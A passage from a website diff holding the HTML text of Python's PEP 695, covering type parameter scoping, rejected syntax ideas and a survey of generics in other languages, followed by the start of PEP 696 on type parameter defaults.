+class Foo[T: X, U: X]:
+    t, u = T, U
+
+print(Foo.t.__bound__)  # prints "int"
+X = str
+print(Foo.u.__bound__)  # prints "str"
+
+
+

Similar examples affecting type annotations can be constructed using the +semantics of PEP 563 or PEP 649.

+

A naive implementation of lazy evaluation would handle class namespaces +incorrectly, because functions within a class do not normally have access to +the enclosing class namespace. The implementation will retain a reference to +the class namespace so that class-scoped names are resolved correctly.

+
+
+

Scoping Behavior

+

The new syntax requires a new kind of scope that behaves differently +from existing scopes in Python. Thus, the new syntax cannot be described exactly in terms of +existing Python scoping behavior. This section specifies these scopes +further by reference to existing scoping behavior: the new scopes behave +like function scopes, except for a number of minor differences listed below.

+

All examples include functions introduced with the pseudo-keyword def695. +This keyword will not exist in the actual language; it is used to +clarify that the new scopes are for the most part like function scopes.

+

def695 scopes differ from regular function scopes in the following ways:

+
    +
  • If a def695 scope is immediately within a class scope, or within another +def695 scope that is immediately within a class scope, then names defined +in that class scope can be accessed within the def695 scope. (Regular functions, +by contrast, cannot access names defined within an enclosing class scope.)
  • +
  • The following constructs are disallowed directly within a def695 scope, though +they may be used within other scopes nested inside a def695 scope:
      +
    • yield
    • +
    • yield from
    • +
    • await
    • +
    • := (walrus operator)
    • +
    +
  • +
  • The qualified name (__qualname__) of objects (classes and functions) defined within def695 scopes +is as if the objects were defined within the closest enclosing scope.
  • +
  • Names bound within def695 scopes cannot be rebound with a nonlocal statement in nested scopes.
  • +
+

def695 scopes are used for the evaluation of several new syntactic constructs proposed +in this PEP. Some are evaluated eagerly (when a type alias, function, or class is defined); others are +evaluated lazily (only when evaluation is specifically requested). In all cases, the scoping semantics are identical:

+
    +
  • Eagerly evaluated values:
      +
    • The type parameters of generic type aliases
    • +
    • The type parameters and annotations of generic functions
    • +
    • The type parameters and base class expressions of generic classes
    • +
    +
  • +
  • Lazily evaluated values:
      +
    • The value of generic type aliases
    • +
    • The bounds of type variables
    • +
    • The constraints of type variables
    • +
    +
  • +
+

In the below translations, names that start with two underscores are internal to the implementation +and not visible to actual Python code. We use the following intrinsic functions, which in the real +implementation are defined directly in the interpreter:

+
    +
  • __make_typealias(*, name, type_params=(), evaluate_value): Creates a new typing.TypeAlias object with the given +name, type parameters, and lazily evaluated value. The value is not evaluated until the __value__ attribute +is accessed.
  • +
  • __make_typevar_with_bound(*, name, evaluate_bound): Creates a new typing.TypeVar object with the given +name and lazily evaluated bound. The bound is not evaluated until the __bound__ attribute is accessed.
  • +
  • __make_typevar_with_constraints(*, name, evaluate_constraints): Creates a new typing.TypeVar object with the given +name and lazily evaluated constraints. The constraints are not evaluated until the __constraints__ attribute +is accessed.
  • +
+

Non-generic type aliases are translated as follows:

+
type Alias = int
+
+
+

Equivalent to:

+
def695 __evaluate_Alias():
+    return int
+
+Alias = __make_typealias(name='Alias', evaluate_value=__evaluate_Alias)
+
+
+

Generic type aliases:

+
type Alias[T: int] = list[T]
+
+
+

Equivalent to:

+
def695 __generic_parameters_of_Alias():
+    def695 __evaluate_T_bound():
+        return int
+    T = __make_typevar_with_bound(name='T', evaluate_bound=__evaluate_T_bound)
+
+    def695 __evaluate_Alias():
+        return list[T]
+    return __make_typealias(name='Alias', type_params=(T,), evaluate_value=__evaluate_Alias)
+
+Alias = __generic_parameters_of_Alias()
+
+
+

Generic functions:

+
def f[T](x: T) -> T:
+    return x
+
+
+

Equivalent to:

+
def695 __generic_parameters_of_f():
+    T = typing.TypeVar(name='T')
+
+    def f(x: T) -> T:
+        return x
+    f.__type_params__ = (T,)
+    return f
+
+f = __generic_parameters_of_f()
+
+
+

A fuller example of generic functions, illustrating the scoping behavior of defaults, decorators, and bounds. Note that this example does not use ParamSpec correctly, so it should be rejected by a static type checker. It is however valid at runtime, and it is used here to illustrate the runtime semantics.

+
@decorator
+def f[T: int, U: (int, str), *Ts, **P](
+    y: U,
+    x: T = SOME_CONSTANT,
+    *args: *Ts,
+    **kwargs: P.kwargs,
+) -> T:
+    return x
+
+
+

Equivalent to:

+
__default_of_x = SOME_CONSTANT  # evaluated outside the def695 scope
+def695 __generic_parameters_of_f():
+    def695 __evaluate_T_bound():
+        return int
+    T = __make_typevar_with_bound(name='T', evaluate_bound=__evaluate_T_bound)
+
+    def695 __evaluate_U_constraints():
+        return (int, str)
+    U = __make_typevar_with_constraints(name='U', evaluate_constraints=__evaluate_U_constraints)
+
+    Ts = typing.TypeVarTuple("Ts")
+    P = typing.ParamSpec("P")
+
+    def f(y: U, x: T = __default_of_x, *args: *Ts, **kwargs: P.kwargs) -> T:
+        return x
+    f.__type_params__ = (T, U, Ts, P)
+    return f
+
+f = decorator(__generic_parameters_of_f())
+
+
+

Generic classes:

+
class C[T](Base):
+    def __init__(self, x: T):
+        self.x = x
+
+
+

Equivalent to:

+
def695 __generic_parameters_of_C():
+    T = typing.TypeVar('T')
+    class C(Base):
+        __type_params__ = (T,)
+        def __init__(self, x: T):
+            self.x = x
+    return C
+
+C = __generic_parameters_of_C()
+
+
+

The biggest divergence from existing behavior for def695 scopes +is the behavior within class scopes. This divergence is necessary +so that generics defined within classes behave in an intuitive way:

+
class C:
+    class Nested: ...
+    def generic_method[T](self, x: T, y: Nested) -> T: ...
+
+
+

Equivalent to:

+
class C:
+    class Nested: ...
+
+    def695 __generic_parameters_of_generic_method():
+        T = typing.TypeVar('T')
+
+        def generic_method(self, x: T, y: Nested) -> T: ...
+        return generic_method
+
+    generic_method = __generic_parameters_of_generic_method()
+
+
+

In this example, the annotations for x and y are evaluated within +a def695 scope, because they need access to the type parameter T +for the generic method. However, they also need access to the Nested +name defined within the class namespace. If def695 scopes behaved +like regular function scopes, Nested would not be visible within the +function scope. Therefore, def695 scopes that are immediately within +class scopes have access to that class scope, as described above.

+
+
+

Library Changes

+

Several classes in the typing module that are currently implemented in +Python must be partially implemented in C. This includes TypeVar, +TypeVarTuple, ParamSpec, and Generic, and the new class +TypeAliasType (described above). The implementation may delegate to the +Python version of typing.py for some behaviors that interact heavily with +the rest of the module. The +documented behaviors of these classes should not change.

+
+
+
+

Reference Implementation

+

This proposal is prototyped in +CPython PR #103764.

+

The Pyright type checker supports the behavior described in this PEP.

+
+
+

Rejected Ideas

+
+

Prefix Clause

+

We explored various syntactic options for specifying type parameters that +preceded def and class statements. One such variant we considered +used a using clause as follows:

+
using S, T
+class ClassA: ...
+
+
+

This option was rejected because the scoping rules for the type parameters +were less clear. Also, this syntax did not interact well with class and +function decorators, which are common in Python. Only one other popular +programming language, C++, uses this approach.

+

We likewise considered prefix forms that looked like decorators (e.g., +@using(S, T)). This idea was rejected because such forms would be confused +with regular decorators, and they would not compose well with existing +decorators. Furthermore, decorators are logically executed after the statement +they are decorating, so it would be confusing for them to introduce symbols +(type parameters) that are visible within the “decorated” statement, which is +logically executed before the decorator itself.

+
+
+

Angle Brackets

+

Many languages that support generics make use of angle brackets. (Refer to +the table at the end of Appendix A for a summary.) We explored the use of +angle brackets for type parameter declarations in Python, but we ultimately +rejected it for two reasons. First, angle brackets are not considered +“paired” by the Python scanner, so end-of-line characters between a < +and > token are retained. That means any line breaks within a list of +type parameters would require the use of unsightly and cumbersome \ escape +sequences. Second, Python has already established the use of square brackets +for explicit specialization of a generic type (e.g., list[int]). We +concluded that it would be inconsistent and confusing to use angle brackets +for generic declarations but square brackets for explicit specialization. All +other languages that we surveyed were consistent in this regard.

+
+
+

Bounds Syntax

+

We explored various syntactic options for specifying the bounds and constraints +for a type variable. We considered, but ultimately rejected, the use +of a <: token like in Scala, the use of an extends or with +keyword like in various other languages, and the use of a function call +syntax similar to today’s typing.TypeVar constructor. The simple colon +syntax is consistent with many other programming languages (see Appendix A), +and it was heavily preferred by a cross section of Python developers who +were surveyed.

+
+
+

Explicit Variance

+

We considered adding syntax for specifying whether a type parameter is intended +to be invariant, covariant, or contravariant. The typing.TypeVar mechanism +in Python requires this. A few other languages including Scala and C# +also require developers to specify the variance. We rejected this idea because +variance can generally be inferred, and most modern programming languages +do infer variance based on usage. Variance is an advanced topic that +many developers find confusing, so we want to eliminate the need to +understand this concept for most Python developers.

+
+
+

Name Mangling

+

When considering implementation options, we considered a “name mangling” +approach where each type parameter was given a unique “mangled” name by the +compiler. This mangled name would be based on the qualified name of the +generic class, function or type alias it was associated with. This approach +was rejected because qualified names are not necessarily unique, which means +the mangled name would need to be based on some other randomized value. +Furthermore, this approach is not compatible with techniques used for +evaluating quoted (forward referenced) type annotations.

+
+
+
+

Appendix A: Survey of Type Parameter Syntax

+

Support for generic types is found in many programming languages. In this +section, we provide a survey of the options used by other popular programming +languages. This is relevant because familiarity with other languages will +make it easier for Python developers to understand this concept. We provide +additional details here (for example, default type argument support) that +may be useful when considering future extensions to the Python type system.

+
+

C++

+

C++ uses angle brackets in combination with keywords template and +typename to declare type parameters. It uses angle brackets for +specialization.

+

C++20 introduced the notion of generalized constraints, which can act +like protocols in Python. A collection of constraints can be defined in +a named entity called a concept.

+

Variance is not explicitly specified, but constraints can enforce variance.

+

A default type argument can be specified using the = operator.

+
// Generic class
+template <typename T>
+class ClassA
+{
+    // Constraints are supported through compile-time assertions.
+    static_assert(std::is_base_of<BaseClass, T>::value);
+
+public:
+    Container<T> t;
+};
+
+// Generic function with default type argument
+template <typename S = int>
+S func1(ClassA<S> a, S b) {};
+
+// C++20 introduced a more generalized notion of "constraints"
+// and "concepts", which are named constraints.
+
+// A sample concept
+template<typename T>
+concept Hashable = requires(T a)
+{
+    { std::hash<T>{}(a) } -> std::convertible_to<std::size_t>;
+};
+
+// Use of a concept in a template
+template<Hashable T>
+void func2(T value) {}
+
+// Alternative use of concept
+template<typename T> requires Hashable<T>
+void func3(T value) {}
+
+// Alternative use of concept
+template<typename T>
+void func4(T value) requires Hashable<T> {}
+
+
+
+
+

Java

+

Java uses angle brackets to declare type parameters and for specialization. +By default, type parameters are invariant. +The extends keyword is used to specify an upper bound. The super keyword +is used to specify a contravariant bound.

+

Java uses use-site variance. The compiler places limits on which methods and +members can be accessed based on the use of a generic type. Variance is +not specified explicitly.

+

Java provides no way to specify a default type argument.

+
// Generic class
+public class ClassA<T> {
+    public Container<T> t;
+
+    // Generic method
+    public <S extends Number> void method1(S value) { }
+
+    // Use site variance
+    public void method1(ClassA<? super Integer> value) { }
+}
+
+
+
+
+

C#

+

C# uses angle brackets to declare type parameters and for specialization. +The where keyword and a colon is used to specify the bound for a type +parameter.

+

C# uses declaration-site variance using the keywords in and out for +contravariance and covariance, respectively. By default, type parameters are +invariant.

+

C# provides no way to specify a default type argument.

+
// Generic class with bounds on type parameters
+public class ClassA<S, T>
+    where T : SomeClass1
+    where S : SomeClass2
+{
+    // Generic method
+    public void MyMethod<U>(U value) where U : SomeClass3 { }
+}
+
+// Contravariant and covariant type parameters
+public class ClassB<in S, out T>
+{
+    public T MyMethod(S value) { }
+}
+
+
+
+
+

TypeScript

+

TypeScript uses angle brackets to declare type parameters and for +specialization. The extends keyword is used to specify a bound. It can be +combined with other type operators such as keyof.

+

TypeScript uses declaration-site variance. Variance is inferred from +usage, not specified explicitly. TypeScript 4.7 introduced the ability +to specify variance using in and out keywords. This was added to handle +extremely complex types where inference of variance was expensive.

+

A default type argument can be specified using the = operator.

+

TypeScript supports the type keyword to declare a type alias, and this +syntax supports generics.

+
// Generic interface
+interface InterfaceA<S, T extends SomeInterface1> {
+    val1: S;
+    val2: T;
+
+    method1<U extends SomeInterface2>(val: U): S
+}
+
+// Generic function
+function func1<T, K extends keyof T>(obj: T, key: K) { }
+
+// Contravariant and covariant type parameters (TypeScript 4.7)
+interface InterfaceB<in S, out T> { }
+
+// Type parameter with default
+interface InterfaceC<T = SomeInterface3> { }
+
+// Generic type alias
+type MyType<T extends SomeInterface4> = Array<T>
+
+
+
+
+

Scala

+

In Scala, square brackets are used to declare type parameters. Square +brackets are also used for specialization. The <: and >: operators +are used to specify upper and lower bounds, respectively.

+

Scala uses use-site variance but also allows declaration-site variance +specification. It uses a + or - prefix operator for covariance and +contravariance, respectively.

+

Scala provides no way to specify a default type argument.

+

It does support higher-kinded types (type parameters that themselves accept type parameters).

+
// Generic class; type parameter has upper bound
+class ClassA[A <: SomeClass1]
+{
+    // Generic method; type parameter has lower bound
+    def method1[B >: A](value: B) ...
+}
+
+// Use of an upper and lower bound with the same type parameter
+class ClassB[A >: SomeClass1 <: SomeClass2] { }
+
+// Contravariant and covariant type parameters
+class ClassC[+A, -B] { }
+
+// Higher-kinded type
+trait Collection[T[_]]
+{
+    def method1[A](a: A): T[A]
+    def method2[B](b: T[B]): B
+}
+
+// Generic type alias
+type MyType[T <: Int] = Container[T]
+
+
+
+
+

Swift

+

Swift uses angle brackets to declare type parameters and for specialization. +The upper bound of a type parameter is specified using a colon.

+

Swift doesn’t support generic variance; all type parameters are invariant.

+

Swift provides no way to specify a default type argument.

+
// Generic class
+class ClassA<T> {
+    // Generic method
+    func method1<X>(val: T) -> X { }
+}
+
+// Type parameter with upper bound constraint
+class ClassB<T: SomeClass1> {}
+
+// Generic type alias
+typealias MyType<A> = Container<A>
+
+
+
+
+

Rust

+

Rust uses angle brackets to declare type parameters and for specialization. +The upper bound of a type parameter is specified using a colon. Alternatively +a where clause can specify various constraints.

+

Rust does not have traditional object oriented inheritance or variance. +Subtyping in Rust is very restricted and occurs only due to variance with +respect to lifetimes.

+

A default type argument can be specified using the = operator.

+
// Generic class
+struct StructA<T> { // T's lifetime is inferred as covariant
+    x: T
+}
+
+fn f<'a>(
+    mut short_lifetime: StructA<&'a i32>,
+    mut long_lifetime: StructA<&'static i32>,
+) {
+    long_lifetime = short_lifetime;
+    // error: StructA<&'a i32> is not a subtype of StructA<&'static i32>
+    short_lifetime = long_lifetime;
+    // valid: StructA<&'static i32> is a subtype of StructA<&'a i32>
+}
+
+// Type parameter with bound
+struct StructB<T: SomeTrait> {}
+
+// Type parameter with additional constraints
+struct StructC<T>
+where
+    T: Iterator,
+    T::Item: Copy
+{}
+
+// Generic function
+fn func1<T>(val: &[T]) -> T { }
+
+// Generic type alias
+type MyType<T> = StructC<T>;
+
+
+
+
+

Kotlin

+

Kotlin uses angle brackets to declare type parameters and for specialization. +By default, type parameters are invariant. The upper bound of a type is +specified using a colon. +Alternatively, a where clause can specify various constraints.

+

Kotlin supports declaration-site variance, where the variance of type parameters is explicitly declared using the in and out keywords. It also supports use-site variance, which limits which methods and members can be used.

+

Kotlin provides no way to specify a default type argument.

+
// Generic class
+class ClassA<T>
+
+// Type parameter with upper bound
+class ClassB<T : SomeClass1>
+
+// Contravariant and covariant type parameters
+class ClassC<in S, out T>
+
+// Generic function
+fun <T> func1(): T {
+
+    // Use site variance
+    val covariantA: ClassA<out Number>
+    val contravariantA: ClassA<in Number>
+}
+
+// Generic type alias
+typealias TypeAliasFoo<T> = ClassA<T>
+
+
+
+
+

Julia

+

Julia uses curly braces to declare type parameters and for specialization. +The <: operator can be used within a where clause to declare +upper and lower bounds on a type.

+
# Generic struct; type parameter with upper and lower bounds
+# Valid for T in (Int64, Signed, Integer, Real, Number)
+struct Container{Int <: T <: Number}
+    x::T
+end
+
+# Generic function
+function func1(v::Container{T}) where T <: Real end
+
+# Alternate forms of generic function
+function func2(v::Container{T} where T <: Real) end
+function func3(v::Container{<: Real}) end
+
+# Tuple types are covariant
+# Valid for func4((2//3, 3.5))
+function func4(t::Tuple{Real,Real}) end
+
+
+
+
+

Dart

+

Dart uses angle brackets to declare type parameters and for specialization. +The upper bound of a type is specified using the extends keyword. +By default, type parameters are covariant.

+

Dart supports declaration-site variance, where the variance of type parameters is explicitly declared using the in, out, and inout keywords. It does not support use-site variance.

+

Dart provides no way to specify a default type argument.

+
// Generic class
+class ClassA<T> { }
+
+// Type parameter with upper bound
+class ClassB<T extends SomeClass1> { }
+
+// Contravariant and covariant type parameters
+class ClassC<in S, out T> { }
+
+// Generic function
+T func1<T>() { }
+
+// Generic type alias
+typedef TypeDefFoo<T> = ClassA<T>;
+
+
+
+
+

Go

+

Go uses square brackets to declare type parameters and for specialization. The upper bound of a type parameter is written after its name and must always be supplied. The keyword any is used for an unbound type parameter.

+

Go doesn’t support variance; all type parameters are invariant.

+

Go provides no way to specify a default type argument.

+

Go does not support generic type aliases.

+
// Generic type without a bound
+type TypeA[T any] struct {
+    t T
+}
+
+// Type parameter with upper bound
+type TypeB[T SomeType1] struct { }
+
+// Generic function
+func func1[T any]() { }
+
+
+
+
+

Summary

=================  ============  ===========  ===========  =============  =============  =================
Language           Decl Syntax   Upper Bound  Lower Bound  Default Value  Variance Site  Variance
=================  ============  ===========  ===========  =============  =============  =================
C++                template <>   n/a          n/a          =              n/a            n/a
Java               <>            extends                                  use            super, extends
C#                 <>            where                                    decl           in, out
TypeScript         <>            extends                   =              decl           inferred, in, out
Scala              []            T <: X       T >: X                      use, decl      +, -
Swift              <>            T: X                                     n/a            n/a
Rust               <>            T: X, where               =              n/a            n/a
Kotlin             <>            T: X, where                              use, decl      in, out
Julia              {}            T <: X       X <: T                      n/a            n/a
Dart               <>            extends                                  decl           in, out, inout
Go                 []            T X                                      n/a            n/a
Python (proposed)  []            T: X                                     decl           inferred
=================  ============  ===========  ===========  =============  =============  =================
+
+
+
+
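For comparison with the language examples above, here is a brief sketch of the corresponding declarations under the syntax proposed in this PEP (SomeClass1 is a placeholder name, as in the other languages' examples):
# Generic class (proposed Python syntax)
+class ClassA[T]: ...
+
+# Type parameter with upper bound
+class ClassB[T: SomeClass1]: ...
+
+# Generic function
+def func1[T](val: T) -> T: ...
+
+# Generic type alias
+type MyType[T: SomeClass1] = list[T]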

Acknowledgements

+

Thanks to Sebastian Rittau for kick-starting the discussions that led to this +proposal, to Jukka Lehtosalo for proposing the syntax for type alias +statements and to Jelle Zijlstra, Daniel Moisset, and Guido van Rossum +for their valuable feedback and suggested improvements to the specification +and implementation.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0695.rst

+

Last modified: 2024-02-17 03:25:41 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0696/index.html b/pep-0696/index.html new file mode 100644 index 00000000000..2c6c5c766b5 --- /dev/null +++ b/pep-0696/index.html @@ -0,0 +1,769 @@ PEP 696 – Type Defaults for Type Parameters | peps.python.org
+
+

+
+
+

PEP 696 – Type Defaults for Type Parameters

+
+
Author:
+
James Hilton-Balfe <gobot1234yt at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
14-Jul-2022
+
Python-Version:
+
3.13
+
Post-History:
+
22-Mar-2022, +08-Jan-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Defaults for Type Parameters and +Type parameter lists for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP introduces the concept of type defaults for type parameters, +including TypeVar, ParamSpec, and TypeVarTuple, +which act as defaults for type parameters for which no type is specified.

+

Default type argument support is available in some popular languages +such as C++, TypeScript, and Rust. A survey of type parameter syntax in +some common languages has been conducted by the author of PEP 695 +and can be found in its +Appendix A.

+
+
+

Motivation

+
T = TypeVar("T", default=int)  # This means that if no type is specified T = int
+
+@dataclass
+class Box(Generic[T]):
+    value: T | None = None
+
+reveal_type(Box())                      # type is Box[int]
+reveal_type(Box(value="Hello World!"))  # type is Box[str]
+
+
+

One place this regularly comes +up is Generator. I +propose changing the stub definition to something like:

+
YieldT = TypeVar("YieldT")
+SendT = TypeVar("SendT", default=None)
+ReturnT = TypeVar("ReturnT", default=None)
+
+class Generator(Generic[YieldT, SendT, ReturnT]): ...
+
+Generator[int] == Generator[int, None] == Generator[int, None, None]
+
+
+

This is also useful for a Generic that is commonly over one type.

+
class Bot: ...
+
+BotT = TypeVar("BotT", bound=Bot, default=Bot)
+
+class Context(Generic[BotT]):
+    bot: BotT
+
+class MyBot(Bot): ...
+
+reveal_type(Context().bot)         # type is Bot  # notice this is not Any which is what it would be currently
+reveal_type(Context[MyBot]().bot)  # type is MyBot
+
+
+

Not only does this improve typing for those who explicitly use it, it +also helps non-typing users who rely on auto-complete to speed up their +development.

+

This design pattern is common in projects like:

+
    +
  • discord.py — where the +example above was taken from.
  • +
  • NumPy — the default for types +like ndarray’s dtype would be float64. Currently it’s +Unknown or Any.
  • +
  • TensorFlow — this +could be used for Tensor similarly to numpy.ndarray and would be +useful to simplify the definition of Layer.
  • +
+
+
+

Specification

+
+

Default Ordering and Subscription Rules

+

The order for defaults should follow the standard function parameter +rules, so a type parameter with no default cannot follow one with +a default value. Doing so should ideally raise a TypeError in +typing._GenericAlias/types.GenericAlias, and a type checker +should flag this as an error.

+
DefaultStrT = TypeVar("DefaultStrT", default=str)
+DefaultIntT = TypeVar("DefaultIntT", default=int)
+DefaultBoolT = TypeVar("DefaultBoolT", default=bool)
+T = TypeVar("T")
+T1 = TypeVar("T1")
+T2 = TypeVar("T2")
+
+class NonDefaultFollowsDefault(Generic[DefaultStrT, T]): ...  # Invalid: non-default TypeVars cannot follow ones with defaults
+
+
+class NoNonDefaults(Generic[DefaultStrT, DefaultIntT]): ...
+
+(
+    NoNonDefaults ==
+    NoNonDefaults[str] ==
+    NoNonDefaults[str, int]
+)  # All valid
+
+
+class OneDefault(Generic[T, DefaultBoolT]): ...
+
+OneDefault[float] == OneDefault[float, bool]  # Valid
+reveal_type(OneDefault)          # type is type[OneDefault[T, DefaultBoolT = bool]]
+reveal_type(OneDefault[float]()) # type is OneDefault[float, bool]
+
+
+class AllTheDefaults(Generic[T1, T2, DefaultStrT, DefaultIntT, DefaultBoolT]): ...
+
+reveal_type(AllTheDefaults)                  # type is type[AllTheDefaults[T1, T2, DefaultStrT = str, DefaultIntT = int, DefaultBoolT = bool]]
+reveal_type(AllTheDefaults[int, complex]())  # type is AllTheDefaults[int, complex, str, int, bool]
+AllTheDefaults[int]  # Invalid: expected 2 arguments to AllTheDefaults
+(
+    AllTheDefaults[int, complex] ==
+    AllTheDefaults[int, complex, str] ==
+    AllTheDefaults[int, complex, str, int] ==
+    AllTheDefaults[int, complex, str, int, bool]
+)  # All valid
+
+
+

With the new Python 3.12 syntax for generics (introduced by PEP 695), this can +be enforced at compile time:

+
type Alias[DefaultT = int, T] = tuple[DefaultT, T]  # SyntaxError: non-default TypeVars cannot follow ones with defaults
+
+def generic_func[DefaultT = int, T](x: DefaultT, y: T) -> None: ...  # SyntaxError: non-default TypeVars cannot follow ones with defaults
+
+class GenericClass[DefaultT = int, T]: ...  # SyntaxError: non-default TypeVars cannot follow ones with defaults
+
+
+
+
+

ParamSpec Defaults

+

ParamSpec defaults are defined using the same syntax as TypeVars, but use a list of types, an ellipsis literal “...”, or another in-scope ParamSpec (see Scoping Rules).

+
DefaultP = ParamSpec("DefaultP", default=[str, int])
+
+class Foo(Generic[DefaultP]): ...
+
+reveal_type(Foo)                  # type is type[Foo[DefaultP = [str, int]]]
+reveal_type(Foo())                # type is Foo[[str, int]]
+reveal_type(Foo[[bool, bool]]())  # type is Foo[[bool, bool]]
+
+
+
+
+

TypeVarTuple Defaults

+

TypeVarTuple defaults are defined using the same syntax as TypeVars, but use an unpacked tuple of types instead of a single type, or another in-scope TypeVarTuple (see Scoping Rules).

+
DefaultTs = TypeVarTuple("DefaultTs", default=Unpack[tuple[str, int]])
+
+class Foo(Generic[*DefaultTs]): ...
+
+reveal_type(Foo)               # type is type[Foo[DefaultTs = *tuple[str, int]]]
+reveal_type(Foo())             # type is Foo[str, int]
+reveal_type(Foo[int, bool]())  # type is Foo[int, bool]
+
+
+
+
+

Using Another Type Parameter as default

+

This allows for a value to be used again when the type parameter to a +generic is missing but another type parameter is specified.

+

To use another type parameter as a default the default and the +type parameter must be the same type (a TypeVar’s default must be +a TypeVar, etc.).

+

This could be used on builtins.slice, where the start parameter should default to int, stop should default to the type of start, and step should default to int | None.

+
StartT = TypeVar("StartT", default=int)
+StopT = TypeVar("StopT", default=StartT)
+StepT = TypeVar("StepT", default=int | None)
+
+class slice(Generic[StartT, StopT, StepT]): ...
+
+reveal_type(slice)  # type is type[slice[StartT = int, StopT = StartT, StepT = int | None]]
+reveal_type(slice())                        # type is slice[int, int, int | None]
+reveal_type(slice[str]())                   # type is slice[str, str, int | None]
+reveal_type(slice[str, bool, timedelta]())  # type is slice[str, bool, timedelta]
+
+T2 = TypeVar("T2", default=DefaultStrT)
+
+class Foo(Generic[DefaultStrT, T2]):
+    def __init__(self, a: DefaultStrT, b: T2) -> None: ...
+
+reveal_type(Foo(1, ""))  # type is Foo[int, str]
+Foo[int](1, "")          # Invalid: Foo[int, str] cannot be assigned to self: Foo[int, int] in Foo.__init__
+Foo[int]("", 1)          # Invalid: Foo[str, int] cannot be assigned to self: Foo[int, int] in Foo.__init__
+
+
+

When using a type parameter as the default to another type parameter, the +following rules apply, where T1 is the default for T2.

+
+

Scoping Rules

+

T1 must be used before T2 in the parameter list of the generic.

+
T2 = TypeVar("T2", default=T1)
+
+class Foo(Generic[T1, T2]): ...   # Valid
+class Foo(Generic[T1]):
+    class Bar(Generic[T2]): ...   # Valid
+
+StartT = TypeVar("StartT", default="StopT")  # Swapped defaults around from previous example
+StopT = TypeVar("StopT", default=int)
+class slice(Generic[StartT, StopT, StepT]): ...
+                  # ^^^^^^ Invalid: ordering does not allow StopT to be bound
+
+
+

Using a type parameter from an outer scope as a default is not supported.

+
+
+

Bound Rules

+

T1’s bound must be a subtype of T2’s bound.

+
T1 = TypeVar("T1", bound=int)
+TypeVar("Ok", default=T1, bound=float)     # Valid
+TypeVar("AlsoOk", default=T1, bound=int)   # Valid
+TypeVar("Invalid", default=T1, bound=str)  # Invalid: int is not a subtype of str
+
+
+
+
+

Constraint Rules

+

The constraints of T2 must be a superset of the constraints of T1.

+
T1 = TypeVar("T1", bound=int)
+TypeVar("Invalid", float, str, default=T1)         # Invalid: upper bound int is incompatible with constraints float or str
+
+T1 = TypeVar("T1", int, str)
+TypeVar("AlsoOk", int, str, bool, default=T1)      # Valid
+TypeVar("AlsoInvalid", bool, complex, default=T1)  # Invalid: {bool, complex} is not a superset of {int, str}
+
+
+
+
+

Type Parameters as Parameters to Generics

+

Type parameters are valid as parameters to generics inside of a +default when the first parameter is in scope as determined by the +previous section.

+
T = TypeVar("T")
+ListDefaultT = TypeVar("ListDefaultT", default=list[T])
+
+class Bar(Generic[T, ListDefaultT]):
+    def __init__(self, x: T, y: ListDefaultT): ...
+
+reveal_type(Bar)                    # type is type[Bar[T, ListDefaultT = list[T]]]
+reveal_type(Bar[int])               # type is type[Bar[int, list[int]]]
+reveal_type(Bar[int]())             # type is Bar[int, list[int]]
+reveal_type(Bar[int, list[str]]())  # type is Bar[int, list[str]]
+reveal_type(Bar[int, str]())        # type is Bar[int, str]
+
+
+
+
+

Specialisation Rules

+

Type parameters currently cannot be further subscripted. This might +change if Higher Kinded TypeVars +are implemented.

+
+
+
+

Generic TypeAliases

+

Generic TypeAliases should be able to be further subscripted +following normal subscription rules. If a type parameter has a default +that hasn’t been overridden it should be treated like it was +substituted into the TypeAlias. However, it can be specialised +further down the line.

+
class SomethingWithNoDefaults(Generic[T, T2]): ...
+
+MyAlias: TypeAlias = SomethingWithNoDefaults[int, DefaultStrT]  # Valid
+reveal_type(MyAlias)          # type is type[SomethingWithNoDefaults[int, DefaultStrT]]
+reveal_type(MyAlias[bool]())  # type is SomethingWithNoDefaults[int, bool]
+
+MyAlias[bool, int]  # Invalid: too many arguments passed to MyAlias
+
+
+
+
+

Subclassing

+

Subclasses of Generics with type parameters that have defaults +behave similarly to Generic TypeAliases. That is, subclasses can be +further subscripted following normal subscription rules, non-overridden +defaults should be substituted in, and type parameters with such defaults can be +further specialised down the line.

+
class SubclassMe(Generic[T, DefaultStrT]):
+    x: DefaultStrT
+
+class Bar(SubclassMe[int, DefaultStrT]): ...
+reveal_type(Bar)          # type is type[Bar[DefaultStrT = str]]
+reveal_type(Bar())        # type is Bar[str]
+reveal_type(Bar[bool]())  # type is Bar[bool]
+
+class Foo(SubclassMe[float]): ...
+
+reveal_type(Foo().x)  # type is str
+
+Foo[str]  # Invalid: Foo cannot be further subscripted
+
+class Baz(Generic[DefaultIntT, DefaultStrT]): ...
+
+class Spam(Baz): ...
+reveal_type(Spam())  # type is <subclass of Baz[int, str]>
+
+
+
+
+

Using bound and default

+

If both bound and default are passed, default must be a subtype of bound. Otherwise, the type checker should generate an error.

+
TypeVar("Ok", bound=float, default=int)     # Valid
+TypeVar("Invalid", bound=str, default=int)  # Invalid: the bound and default are incompatible
+
+
+
+
+

Constraints

+

For constrained TypeVars, the default needs to be one of the +constraints. A type checker should generate an error even if it is a +subtype of one of the constraints.

+
TypeVar("Ok", float, str, default=float)     # Valid
+TypeVar("Invalid", float, str, default=int)  # Invalid: expected one of float or str got int
+
+
+
+
+

Function Defaults

+

In generic functions, type checkers may use a type parameter’s default when the +type parameter cannot be solved to anything. We leave the semantics of this +usage unspecified, as ensuring the default is returned in every code path +where the type parameter can go unsolved may be too hard to implement. Type +checkers are free to either disallow this case or experiment with implementing +support.

+
T = TypeVar('T', default=int)
+def func(x: int | set[T]) -> T: ...
+reveal_type(func(0))  # a type checker may reveal T's default of int here
+
+
+
+
+

Defaults following TypeVarTuple

+

A TypeVar that immediately follows a TypeVarTuple is not allowed +to have a default, because it would be ambiguous whether a type argument +should be bound to the TypeVarTuple or the defaulted TypeVar.

+
Ts = TypeVarTuple("Ts")
+T = TypeVar("T", default=bool)
+
+class Foo(Generic[Ts, T]): ...  # Type checker error
+
+# Could be reasonably interpreted as either Ts = (int, str, float), T = bool
